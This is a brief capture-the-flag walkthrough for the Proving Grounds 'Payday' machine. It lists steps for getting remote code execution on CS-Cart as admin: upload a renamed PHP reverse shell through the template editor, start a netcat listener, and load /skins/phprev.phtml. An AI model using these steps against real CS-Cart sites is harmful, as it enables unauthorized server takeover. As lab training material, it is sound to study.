Exploiting CS-CART
Authenticated RCE possible as admin. Log in at /admin
Downlaod a PHP rev shell and rename the file to phprev.phtml
phprev.phtml
Change the IP and PORT to match the attacker machine
Upload a reverse php shell to the extension /admin.php?target=template_editor
/admin.php?target=template_editor
Start up listener on an attacker machine
Navigate to /skins/phprev.phtml to start the rev shell ☺️
/skins/phprev.phtml
Proving grounds - Payday
Last updated 2 years ago
sudo nc -lvnp 444